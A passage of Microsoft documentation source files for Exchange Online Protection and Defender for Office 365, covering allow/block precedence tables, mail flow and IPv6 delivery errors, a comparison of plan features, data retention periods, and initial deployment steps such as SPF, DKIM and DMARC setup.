- |Not spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email silently dropped|
--- Allow and block settings in [anti-spam policies](anti-spam-policies-configure.md):
- - Allowed sender and domain list.
- - Blocked sender and domain list.
- - Block messages from specific countries/regions or in specific languages.
- - Block messages based on [Advanced Spam Filter (ASF) settings](anti-spam-policies-asf-settings-about.md).
-
- |Filtering stack verdict|Anti-spam policy allows|Anti-spam policy blocks|
- ||||
- |Malware|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
- |High confidence phishing|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|
- |Phishing|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Phishing action in the applicable anti-spam policy|
- |High confidence spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
- |Spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
- |Bulk|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
- |Not spam|**Tenant wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to user's Junk Email folder|
--- [Allow entries in the Tenant Allow/Block List](tenant-allow-block-list-about.md#allow-entries-in-the-tenant-allowblock-list):-
- |Filtering stack verdict|Email address/domain|
- |||
- |Malware|**Filter wins**: Email quarantined|
- |High confidence phishing|**Filter wins**: Email quarantined|
- |Phishing|**Tenant wins**: Email delivered to mailbox|
- |High confidence spam|**Tenant wins**: Email delivered to mailbox|
- |Spam|**Tenant wins**: Email delivered to mailbox|
- |Bulk|**Tenant wins**: Email delivered to mailbox|
- |Not spam|**Tenant wins**: Email delivered to mailbox|
--- [Block entries in the Tenant Allow/Block List](tenant-allow-block-list-about.md#block-entries-in-the-tenant-allowblock-list):-
- |Filtering stack verdict|Email address/domain|Spoof|File|URL|
- ||||||
- |Malware|**Filter wins**: Email quarantined|**Filter wins**: Email quarantined|**Tenant wins**: Email quarantined|**Filter wins**: Email quarantined|
- |High confidence phishing|**Tenant wins**: Email quarantined|**Filter wins**: Email quarantined|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
- |Phishing|**Tenant wins**: Email quarantined|**Tenant wins**: Spoof action in the applicable anti-phishing policy|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
- |High confidence spam|**Tenant wins**: Email quarantined|**Tenant wins**: Spoof action in the applicable anti-phishing policy|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
- |Spam|**Tenant wins**: Email quarantined|**Tenant wins**: Spoof action in the applicable anti-phishing policy|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
- |Bulk|**Tenant wins**: Email quarantined|**Tenant wins**: Spoof action in the applicable anti-phishing policy|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
- |Not spam|**Tenant wins**: Email quarantined|**Tenant wins**: Spoof action in the applicable anti-phishing policy|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
-
-### User and tenant settings conflict
-
-The following table describes how conflicts are resolved if an email is affected by both user allow/block settings and tenant allow/block settings:
-
-|Type of tenant allow/block|User's Safe Senders/Recipients list|User's Blocked Senders list|
-||||
-|Block entries in the Tenant Allow/Block List for: <ul><li>Email addresses and domains</li><li>Files</li><li>URLs</li></ul>|**Tenant wins**: Email quarantined|**Tenant wins**: Email quarantined|
-|Block entries for spoofed senders in the Tenant Allow/Block List|**Tenant wins**: Spoof intelligence action in the applicable anti-phishing policy|**Tenant wins**: Spoof intelligence action in the applicable anti-phishing policy|
-|Advanced delivery policy|**User wins**: Email delivered to mailbox|**Tenant wins**: Email delivered to mailbox|
-|Block settings in anti-spam policies|**User wins**: Email delivered to mailbox|**User wins**: Email delivered to user's Junk Email folder|
-|Honor DMARC policy|**User wins**: Email delivered to mailbox|**User wins**: Email delivered to user's Junk Email folder|
-|Blocks by mail flow rules|**User wins**: Email delivered to mailbox|**User wins**: Email delivered to user's Junk Email folder|
-|Allows by: <ul><li>Mail flow rules</li><li>IP Allow List (connection filter policy)</li><li>Allowed sender and domain list (anti-spam policies)</li><li>Tenant Allow/Block List</li></ul>|**User wins**: Email delivered to mailbox|**User wins**: Email delivered to user's Junk Email folder|
security Mail Flow About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mail-flow-about.md
- Title: Mail flow in EOP
- - NOCSH
-----
- - seo-marvel-apr2020
-description: Admin can learn about the options for configuring mail flow and routing in Exchange Online Protection (EOP).
---- m365-security-- tier3 Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Mail flow in EOP
--
-In Microsoft 365 organizations with Exchange Online mailboxes, or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, all messages sent to your organization pass through EOP before users see them. You have options about how to route messages that pass through EOP for processing before they're routed to user mailboxes.
-
-## Working with messages and message access options
-
-EOP offers flexibility in how your messages are routed. The following articles explain steps in the mail flow process:
--- [Directory Based Edge Blocking](/exchange/mail-flow-best-practices/use-directory-based-edge-blocking) rejects messages to invalid recipients at the service network perimeter by default.--- [View or edit accepted domains in EOP](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) describes how to manage domains that are associated with your EOP service.--- Your EOP service can help you manage subdomains that you add to your organization. Learn more about subdomains at [Enable mail flow for subdomains in Exchange Online](/exchange/mail-flow-best-practices/manage-accepted-domains/enable-mail-flow-for-subdomains).--- [Configure mail flow using connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow) introduces connectors and shows how you can use them to customize mail routing. Scenarios include ensuring secure communication with a partner organization and setting up a smart host.--- [Enhanced Filtering for Connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) describes how to configure connectors if your mail is routed to a service or device before EOP.--- In hybrid environments where EOP protects on-premises Exchange mailboxes, you need to configure mail flow rules (also known as transport rules) in on-premises Exchange. These mail flow rules translate the EOP spam filtering verdict so the junk email rule in the mailbox can move the message to the Junk Email folder. For details, see [Configure EOP to deliver spam to the Junk Email folder in hybrid environments](/exchange/standalone-eop/configure-eop-spam-protection-hybrid).-
- If you don't want to move messages to each user's Junk Email folder, you can choose another action by editing the default anti-spam policy or custom anti-spam policies. For more information, see [Actions in anti-spam policies](anti-spam-protection-about.md#actions-in-anti-spam-policies).
-
-## Verify mail flow
-
-To verify that EOP mail flow is working correctly, use the following tests:
--- Send an email message from any web-based email account to a recipient in your Microsoft 365 organization.-- Send an email messages from a user in your organization to a web-based email account.-- If you configured connectors for email communication between an on-premises environment or a partner organization, you can use the built-in connector validation to test mail flow. For more information, see [Validate connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/validate-connectors).-
-## Support for anonymous inbound email over IPv6
-
-EOP supports receiving anonymous inbound email over IPv6, but an admin is required to opt in by contacting Microsoft support. To open a support request, see [Get support for Microsoft 365 for business](/microsoft-365/admin/get-help-support).
-
-After the organization has opted in, the organization can receive anonymous inbound email over IPv6 as long as the source IPv6 email server meets both of the following requirements:
--- The source IPv6 address must have a valid reverse DNS lookup (PTR) record that allows the destination to find the domain name from the IPv6 address.-- The sender must pass either SPF verification (defined in [RFC 7208](https://tools.ietf.org/html/rfc7208)) or [DKIM verification](http://dkim.org/) (defined in [RFC 6376](https://www.rfc-editor.org/rfc/rfc6376.txt)).-
-Anonymous messages from IPv6 sources go through regular EOP (and possibly Microsoft Defender for Office 365) message filtering.
-
-### Troubleshooting anonymous IPv6 inbound mail flow
--- If the source email server doesn't have an IPv6 reverse DNS lookup record, the messages are rejected with the following error:-
- > 450 4.7.25 Service unavailable, sending IPv6 address [2a01:111:f200:2004::240] must have reverse DNS record.
--- If the sender doesn't pass SPF or DKIM validation, the messages are rejected with the following error:-
- > 450 4.7.26 Service unavailable, message sent over IPv6 [2a01:111:f200:2004::240] must pass either SPF or DKIM validation.
--- If you try to receive anonymous IPv6 messages before you've opted in, the message is rejected with the following error:-
- > 550 5.2.1 Service unavailable, [contoso.com] does not accept email over IPv6.
-
-## Mail flow delivery FAQ
-
-This FAQ provides information about queued, deferred, and bounced messages in EOP.
-
-### Why is mail queuing?
-
-Messages are queued or deferred if the service is unable to make a connection to the destination server for delivery. Messages aren't deferred if a 500-series (permanent) error is returned from the destination server.
-
-### How does a message become deferred?
-
-Messages are held when a connection to the destination server can't be made, and the destination server returns temporary errors. For example, connection time-out, connection refused, or other 400-series errors. 500-series (permanent) errors result in return of the message in a non-delivery report (also known as an NDR or bounce message).
-
-### How long does a message remain in deferral and what is the retry interval?
-
-Deferred messages remain in our queues for one day. Retry attempts are based on the errors that we receive from the destination email server. The first few deferrals are 15 minutes or less. The interval for subsequent retries increases to a maximum of 60 minutes. The interval duration expansion is dynamic, and considers multiple variables (queue size, internal message priority, etc.).
-
-### After communication to the email server is restored, how are queued messages distributed?
-
-Queued messages are automatically processed in the order in which they were received, and are queued for delivery when the server became unavailable.
-
security Mdo About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-about.md
- Title: Why do I need Microsoft Defender for Office 365?----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
- - highpri
- - essentials-overview
-
- - seo-marvel-apr2020
- - intro-overview
- - curated-apr-2023
-description: Is Microsoft Defender for Office 365 worth it? Let's find out.
-
-adobe-target: true
Previously updated : 4/1/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Microsoft Defender for Office 365 overview
--
-Microsoft Defender for Office 365 is a seamless integration into Microsoft 365 subscriptions that protects against threats in email, links (URLS), file attachments, and collaboration tools. This article explains the _protection ladder_ in Microsoft 365 organizations. The protection ladder starts with Exchange Online Protection (EOP) and continues through to Defender for Office 365, which includes Defender for Office 365 Plan 1 and Defender for Office 365 Plan 2.
-
-This article is intended for Security Operations (SecOps) personnel, admins in Microsoft 365, or decisions makers who want to learn more about Defender for Office 365.
-
-> [!TIP]
-> If you're using **Outlook.com**, **Microsoft 365 Family**, or **Microsoft 365 Personal**, and need information about _Safelinks_ or _advanced attachment scanning_, see [Advanced Outlook.com security for Microsoft 365 subscribers](https://support.microsoft.com/office/882d2243-eab9-4545-a58a-b36fee4a46e2).
->
-> If you're new to your Microsoft 365 subscription and would like to know your licenses before you begin, go the **Your products** page in the Microsoft 365 admin center at <https://admin.microsoft.com/Adminportal/Home#/subscriptions>.
-
-All Microsoft 365 subscriptions include built-in security and protection features. The goals and available actions of these features vary. In Microsoft 365, there are three main security services (or products):
-
-1. **Exchange Online Protection (EOP)**: Included in any subscription that includes Exchange Online mailboxes. Also available as a [standalone subscription](/exchange/standalone-eop/standalone-eop) to protect on-premises email environments.
-2. **Defender for Office 365 365 Plan 1**: Included in some Microsoft 365 subscriptions with Exchange Online mailboxes that cater to small to medium-sized businesses (for example, Microsoft 365 Business Premium).
-3. **Defender for Office 365 365 Plan 2**: Included in some Microsoft 365 subscriptions with Exchange Online mailboxes that cater to enterprise organizations (for example, Microsoft 365 E5, Microsoft 365 A5, and Microsoft 365 GCC G5).
-
-Defender for Office 365 always includes EOP. Defender for Office 365 is also available as an add-in subscription to many Microsoft 365 subscriptions with Exchange Online mailboxes.
-
-Defender for Office 365 Plan 1 contains a subset of the features that are available in Plan 2. Defender for Office 365 Plan 2 contains many features that aren't available in Plan 1.
-
-> [!TIP]
-> For information about subscriptions that contain Defender for Office 365, see the [Microsoft 365 business plan comparison](https://aka.ms/M365BusinessPlans) and the [Microsoft 365 Enterprise plan comparison](https://aka.ms/M365EnterprisePlans).
->
-> Use the following exhaustive reference to determine if Defender for Office 365 Plan 1 or Plan 2 licenses are included in a Microsoft 365 subscription: [Product names and service plan identifiers for licensing](/entra/identity/users/licensing-service-plan-reference).
->
-> Use the following interactive guide to see how Defender for Office 365 is able to protect your organization: [Safeguard your organization with Microsoft Defender for Office 365](https://aka.ms/MSDO-IG).
->
-> Use [this page](https://www.microsoft.com/security/business/siem-and-xdr/microsoft-defender-office-365#pmg-allup-content) to compare plans and purchase Defender for Office 365.
-
-EOP and Defender for Office 365 can be summarized with the following descriptions:
--- **EOP** prevents broad, volume-based, known email attacks.-- **Defender for Office 365 Plan 1** protects email and collaboration features from zero-day malware, phishing, and business email compromise (BEC).-- **Defender for Office 365 Plan 2** adds phishing simulations, post-breach investigation, hunting, and response, and automation.-
-However, you can also think about the _architecture_ of EOP and Defender for Office 365 as _cumulative layers of security_, where each layer has a different _security emphasis_. This architecture is shown in the following diagram:
--
-EOP and Defender for Office 365 are capable of protecting, detecting, investigating, and responding to threats. But as you move up the protection ladder, the _available features_ and _automation_ increase.
-
-Whether you're using the onmicrosoft.com domain only or custom domains for email in Microsoft 365, it's important to configure email authentication for your used and unused domains. SPF, DKIM, and DMARC records in DNS allow Microsoft 365 to more accurately protect against spoofing attacks. For more information, see [Email authentication in Microsoft 365](email-authentication-about.md).
-
-## The Microsoft 365 security ladder from EOP to Defender for Office 365
-
-It can be difficult to identity the advantages of Defender for Office 365 over EOP. The following subsections describe the capabilities of each product using the following security emphases:
--- Preventing and detecting threats.-- Investigating threats.-- Responding to threats.-
-### EOP capabilities
-
-The capabilities of **EOP** are summarized in the following table:
-
-|Prevent/Detect|Investigate|Respond|
-||||
-|<ul><li>[Anti-malware protection](anti-malware-protection-about.md)<sup>\*</sup></li><li>[Anti-spam protection](anti-spam-protection-about.md)<sup>\*</sup>, including [bulk email protection](anti-spam-spam-vs-bulk-about.md)</li><li>[Anti-phishing (spoofing) protection](anti-phishing-protection-spoofing-about.md)<sup>\*</sup>, including the [Spoof intelligence insight](anti-spoofing-spoof-intelligence.md)</li><li>[Outbound spam filtering](outbound-spam-protection-about.md)</li><li>[Connection filtering](connection-filter-policies-configure.md)</li><li>[Quarantine](quarantine-about.md) and [quarantine policies](quarantine-policies.md)</li><li>False positives and false negative reporting by [admin submissions to Microsoft](submissions-admin.md) and [user reported messages](submissions-user-reported-messages-custom-mailbox.md)</li><li>[Allow and block entries in the Tenant Allow/Block List](tenant-allow-block-list-about.md) for: <ul><li>Domains and email addresses</li><li>Spoof</li><li>URLs</li><li>Files</li></ul></li></ul>|<ul><li>[Audit log search](audit-log-search-defender-portal.md)</li><li>[Message Trace](message-trace-defender-portal.md)</li><li>[Email security reports](reports-email-security.md)</li></ul>|<ul><li>[Zero-hour auto purge (ZAP) for email](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-email-messages)</li><li>Refine and test entries in the [Tenant Allow/Block List](tenant-allow-block-list-about.md)</li></ul>|
-
-<sup>\*</sup> The associated protection polices are available in default policies, custom policies, and [the Standard and Strict preset security policies](preset-security-policies.md). For help with deciding which method to use, see [Determine your protection policy strategy](mdo-deployment-guide.md#determine-your-protection-policy-strategy).
-
-For more information about EOP, see [Exchange Online Protection overview](eop-about.md).
-
-### Defender for Office 365 Plan 1 capabilities
-
-Defender for Office 365 Plan 1 expands on the _prevention_ and _detection_ capabilities of EOP.
-
-The additional features that you get in **Defender for Office 365 Plan 1** on top of EOP are described in the following table:
-
-|Prevent/Detect|Investigate|Respond|
-||||
-|<ul><li>The following [additional features in anti-phishing policies](anti-phishing-protection-about.md#additional-anti-phishing-protection-in-microsoft-defender-for-office-365): <ul><li>User and domain impersonation protection</li><li>Mailbox intelligence impersonation protection (contact graph)</li><li>Advanced phishing thresholds</li></ul></li><li>[Safe Attachments in email](safe-attachments-about.md)</li><li>[Safe Attachments for files in SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md)</li><li>[Safe Links in email, Office clients, and Teams](safe-links-about.md)</li><li>Email & collaboration alerts at <https://security.microsoft.com/viewalertsv2><li>SIEM integration API for **alerts**</li></ul>|<ul><li>[Real-time detections](threat-explorer-real-time-detections-about.md)<sup>\*</sup></li><li>[The Email entity page](mdo-email-entity-page.md)</li><li>SIEM integration API for **detections**</li><li>[URL trace](../defender-endpoint/investigate-domain.md)</li><li>[Defender for Office 365 reports](reports-defender-for-office-365.md)</li></ul>|<ul><li>Same</li></ul>|
-
-<sup>\*</sup> The presence of **Email & collaboration** \> **Real-time detections** in the Microsoft Defender portal is a quick way to differentiate between Defender for Office 365 Plan 1 and Plan 2.
--
-### Defender for Office 365 Plan 2 capabilities
-
-Defender for Office 365 Plan 2 expands on the _investigation_ and _response_ capabilities of Plan 1 and EOP, including the addition of _automation_.
-
-The additional features that you get in **Defender for Office 365 Plan 2** on top of Defender for Office 365 Plan 1 and EOP are described in the following table:
-
-|Prevent/Detect|Investigate|Respond|
-||||
-|<ul><li>[Attack simulation training](attack-simulation-training-get-started.md)</li>|<li>[Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md) instead of Real-time detections.<sup>\*</sup></li><li>[Threat Trackers](threat-trackers.md)</li><li>[Campaigns](campaigns.md)</li></ul>|<ul><li>[Automated Investigation and Response (AIR)](air-about.md): <ul><li>AIR from Threat Explorer</li><li>AIR for compromised users</li></ul></li><li>SIEM Integration API for **Automated Investigations**</li></ul>|
-
-<sup>\*</sup> The presence of **Email & collaboration** \> **Explorer** in the Microsoft Defender portal is a quick way to differentiate between Defender for Office 365 Plan 2 and Plan 1.
--
-## Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet
-
-This quick-reference section summarizes the different capabilities between Defender for Office 365 Plan 1 and Plan 2 that aren't included in EOP.
-
-|Defender for Office 365 Plan 1|Defender for Office 365 Plan 2|
-|||
-|Prevent and detect capabilities: <ul><li>[Anti-phishing policies with impersonation protection and Advanced phishing thresholds](anti-phishing-policies-about.md#exclusive-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)</li><li>[Safe Attachments](safe-attachments-about.md), including [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md)</li><li>[Safe Links](safe-links-about.md)</li></ul> <br/> Investigate and respond capabilities: <ul><li>[Real-time detections](threat-explorer-real-time-detections-about.md)</li><li>[The Email entity page](mdo-email-entity-page.md)</li></ul>|Everything in Defender for Office 365 Plan 1 capabilities <br/><br/> plus <br/><br/> Prevent and detect capabilities: <ul><li>[Attack simulation training](attack-simulation-training-simulations.md)</li></ul> <br/> Investigate and respond capabilities: <ul><li>[Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md)</li><li>[Threat Trackers](threat-trackers.md)</li><li>[AIR](air-about.md)</li><li>[Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](../defender/advanced-hunting-overview.md)</li><li>[Investigate incidents in Microsoft Defender XDR](../defender/investigate-incidents.md)</li><li>[Investigate alerts in Microsoft Defender XDR](../defender/investigate-alerts.md)</li></ul>|
--- For more information, see [Feature availability across Defender for Office 365 plans](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description#feature-availability).-- [Safe Documents](safe-documents-in-e5-plus-security-about.md) is available to users with the Microsoft 365 A5 or Microsoft 365 E5 Security licenses (not included in Defender for Office 365 plans).-- If your current subscription doesn't include Defender for Office 365 Plan 2, you can [try Defender for Office 365](try-microsoft-defender-for-office-365.md) free for 90 days. Or, [contact sales to start a trial](https://info.microsoft.com/ww-landing-M365SMB-web-contact.html).-- Defender for Office 365 P2 customers have access to **Microsoft Defender XDR integration** to efficiently detect, review, and respond to incidents and alerts.-
-## Where to go next
-
-[Get started with Microsoft Defender for Office 365](mdo-deployment-guide.md)
-
-[Microsoft Defender for Office 365 Security Operations Guide](mdo-sec-ops-guide.md)
-
-[Migrate from a third-party protection service or device to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md)
-
-[What's new in Microsoft Defender for Office 365](defender-for-office-365-whats-new.md)
-
-The [Microsoft 365 Roadmap](https://www.microsoft.com/microsoft-365/roadmap?filters=&searchterms=Microsoft%2CDefender%2Cfor%2COffice%2C365) describes new features that are being added to Defender for Office 365.
security Mdo Data Retention https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-data-retention.md
- Title: Microsoft Defender for Office 365 data retention-- NOCSH--- Previously updated : 6/15/2023----- m365-security-- tier2-
-description: Admins can learn how long Defender for Office 365 features retain data.
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# Data retention information for Microsoft Defender for Office 365
-
-By default, data across different features is retained for a maximum of 30 days. However, for some of the features, you can specify the retention period based on policy. See the following table for the different retention periods for each feature.
-
-> [!NOTE]
-> Microsoft Defender for Office 365 comes in two different subscriptions: **Plan 1** and **Plan 2**. If you have **Threat Explorer** at <https://security.microsoft.com/threatexplorer>, you have Plan 2. Otherwise, you have **Real-time Detections** at <https://security.microsoft.com/realtimereports> as part of **Plan 1**.
->
-> Your Defender for Office 365 subscription affects the tools that are available to you, so make sure you know which subscription you have as you learn.
-
-## Defender for Office 365 Plan 1
-
-|Feature|Retention period|
-|||
-|Alert metadata details (Defender for Office 365 alerts)|90 days.|
-|Entity metadata details (Email)|30 days.|
-|Activity alert details (audit logs)|7 days.|
-|Email entity page|30 days.|
-|Quarantine|30 days (configurable; 30 days is the maximum).|
-|Reports|90 days for aggregated data. <br/><br/> 30 days for detailed information.|
-|Submissions|30 days.|
-|Real-Time detections|30 days.|
-
-## Defender for Office 365 Plan 2
-
-Defender for Office 365 Plan 1 capabilities, plus:
-
-|Feature|Retention period|
-|||
-|Action Center|180 days. <br/><br/> Office Action Center 30 days.|
-|Advanced Hunting|30 days.|
-|AIR (Automated investigation and response)|60 days for investigations metadata. <br/><br/> 30 days for email metadata.|
-|Attack simulation training data|18 months.|
-|Campaigns|30 days.|
-|Incidents|30 days.|
-|Remediation|30 days|
-|Threat Analytics|30 days.|
-|Threat Explorer|30 days.|
-|Threat Trackers|30 days.|
security Mdo Deployment Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-deployment-guide.md
- Title: Get started with Microsoft Defender for Office 365
- - NOCSH
----
- - MET150
- - MOE150
-
- - zerotrust-solution
- - tier1
- - essentials-get-started
-
-description: Learn how to get started with the initial deployment and configuration of Microsoft Defender for Office 365.
- Previously updated : 01/31/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Get started with Microsoft Defender for Office 365
-
-In new Microsoft 365 organizations with Microsoft Defender for Office 365 (included or as an add-on subscription), this article describes the configuration steps that you need to do in [Exchange Online Protection (EOP)](eop-about.md) and [Defender for Office 365](mdo-about.md) in the earliest days of your organization.
-
-Although your Microsoft 365 organization includes a default level of protection from the moment you create it (or add Defender for Office 365 to it), the steps in this article give you an actionable plan to unleash the full protection capabilities of EOP and Defender for Office 365. After you complete the steps, you can also use this article to show management that you're maximizing your investment in Microsoft 365.
-
-The steps to configure EOP and Defender for Office 365 are described in the following diagram:
--
-> [!TIP]
-> As a companion to this article, we recommend using the Microsoft Defender for Office 365 automated setup guide at <https://admin.microsoft.com/Adminportal/Home?Q=learndocs#/modernonboarding/office365advancedthreatprotectionadvisor>. This guide customizes your experience based on your environment. To review best practices without signing in and activating automated setup features, go to the Microsoft 365 setup portal at <https://setup.microsoft.com/defender/office-365-setup-guide>.
-
-## Requirements
-
-Email threat protection features are included in _all_ Microsoft 365 subscriptions with cloud mailboxes via EOP. Defender for Office 365 includes additional protection features. For detailed comparisons about the features in EOP, Defender for Office 365 for Plan 1, and Defender for Office 365 Plan 2, see [Microsoft Defender for Office 365 overview](mdo-about.md).
-
-### Roles and permissions
-
-To configure EOP and Defender for Office 365 features, you need permissions. The following table lists the permissions that you need to do the steps in this article (one is enough; you don't need all of them).
-
-|Role or role group|Learn more|
-|||
-|Global Administrator in Microsoft Entra|[Microsoft Entra built-in roles](/entra/identity/role-based-access-control/permissions-reference#global-administrator)|
-|Organization Management in Email & collaboration role groups|[Role groups in Microsoft Defender for Office 365](scc-permissions.md#role-groups-in-microsoft-defender-for-office-365-and-microsoft-purview)|
-|Security Administrator in Microsoft Entra|[Microsoft Entra built-in roles](/entra/identity/role-based-access-control/permissions-reference#security-administrator)
-|Security Administrator in Email & collaboration role groups|[Email & collaboration permissions in Microsoft Defender for Office 365](scc-permissions.md#role-groups-in-microsoft-defender-for-office-365-and-microsoft-purview)|
-|Exchange Online Organization Management|[Permissions in Exchange Online](/exchange/permissions-exo/permissions-exo)|
-
-## Step 1: Configure email authentication for your Microsoft 365 domains
-
-**Summary**: Configure [SPF](email-authentication-spf-configure.md), [DKIM](email-authentication-dkim-configure.md), and [DMARC](email-authentication-dmarc-configure.md) records (in that order) for all custom Microsoft 365 domains (including parked domains and subdomains). If necessary, configure any [trusted ARC sealers](email-authentication-arc-configure.md).
-
-**Details**:
-
-Email authentication (also known as _email validation_) is a group of standards to verify that email messages are legitimate, unaltered, and come from expected sources for the sender's email domain. For more information, see [Email authentication in EOP](email-authentication-about.md).
-
-We'll proceed with the assumption that you're using one or more [custom domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365 for email (for example contoso.com) , so you need to create specific email authentication DNS records for each custom domain that you're using for email.
-
-Create the following email authentication DNS records at your DNS registrar or DNS hosting service for each custom domain that you use for email in Microsoft 365:
--- **Sender Policy Framework (SPF)**: The SPF TXT record identifies valid sources of email from senders in the domain. For instructions, see [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md).--- **DomainKeys Identified Mail (DKIM)**: DKIM signs outbound messages and stores the signature in the message header that survives message forwarding. For instructions, see [Use DKIM to validate outbound email sent from your custom domain](email-authentication-dkim-configure.md).--- **Domain-based Message Authentication, Reporting, and Conformance (DMARC)**: DMARC helps destination email servers decide what to do with messages from the custom domain that fail SPF and DKIM checks. Be sure to include the DMARC policy (`p=reject` or `p=quarantine`) and DMARC report destinations (aggregate and forensic reports) in the DMARC records. for instructions, see [Use DMARC to validate email](email-authentication-dmarc-configure.md).--- **Authenticated Received Chain (ARC)**: If you use third-party services that modify _inbound_ messages in transit before delivery to Microsoft 365, you can identify the services as _trusted ARC sealers_ (if they support it) so the modified messages don't automatically fail email authentication checks in Microsoft 365. For instructions, see [Configure trusted ARC sealers](email-authentication-arc-configure.md).-
-If you're using the \*.onmicrosoft.com domain for email (also known as the Microsoft Online Email Routing Address or MOERA domain), there's not nearly as much for you to do:
--- **SPF**: An SPF record is already configured for the \*.onmicrosoft.com domain.-- **DKIM**: DKIM signing is is already configured for outbound mail using the \*.onmicrosoft.com domain, but you can also [manually customize it](email-authentication-dkim-configure.md#use-the-defender-portal-to-customize-dkim-signing-of-outbound-messages-using-the-onmicrosoftcom-domain).-- **DMARC**: You need to manually set up the DMARC record for the \*.onmicrosoft.com domain as described [here](email-authentication-dmarc-configure.md#use-the-microsoft-365-admin-center-to-add-dmarc-txt-records-for-onmicrosoftcom-domains-in-microsoft-365).-
-## Step 2: Configure protection policies
-
-**Summary**: Turn on and use the Standard and/or Strict [preset security policies](preset-security-policies.md) for all recipients. Or, if [business needs dictate](#determine-your-protection-policy-strategy), create and use custom protection policies instead, but check them periodically using the [configuration analyzer](configuration-analyzer-for-security-policies.md).
-
-**Details**:
-
-As you can probably imagine, a lot of protection policies are available in EOP and Defender for Office 365. There are three basic types of protection policies:
--- **Default policies**: These policies exist from the moment the organization is created. They apply to all recipients in the organization, you can't turn the policies off, and you can't modify who the policies apply to. But you can modify the security settings in the policies just like custom policies. The settings in the default policies are described in the tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).-- **Preset security policies**: Preset security are actually _profiles_ that contain _most_ of the available protection policies in EOP and Defender for Office 365 with settings that are tailored to specific levels of protection. The preset security policies are:
- - The Strict preset security policy.
- - The Standard preset security policy.
- - Built-in protection.
-
- The Standard and Strict preset security policies are turned off by default until you turn them on. You specify recipient conditions and exceptions (users, group members, domains, or all recipients) for EOP protection features and Defender for Office 365 protection features within the Standard and Strict preset security policies.
-
- Built-in protection in Defender for Office 365 is on by default to provides basic Safe Attachments and Safe Links protection for all recipients. You can specify recipient exceptions to identify users who don't get the protection.
-
- In Standard and Strict preset security policies in Defender for Office 365 organizations, you need to configure entries and optional exceptions for user and domain impersonation protection. All other settings are locked into our recommended standard and strict values (many of which are the same). You can see the Standard and Strict values in the tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md), and you can see the differences between Standard and Strict [here](preset-security-policies.md#policy-settings-in-preset-security-policies).
-
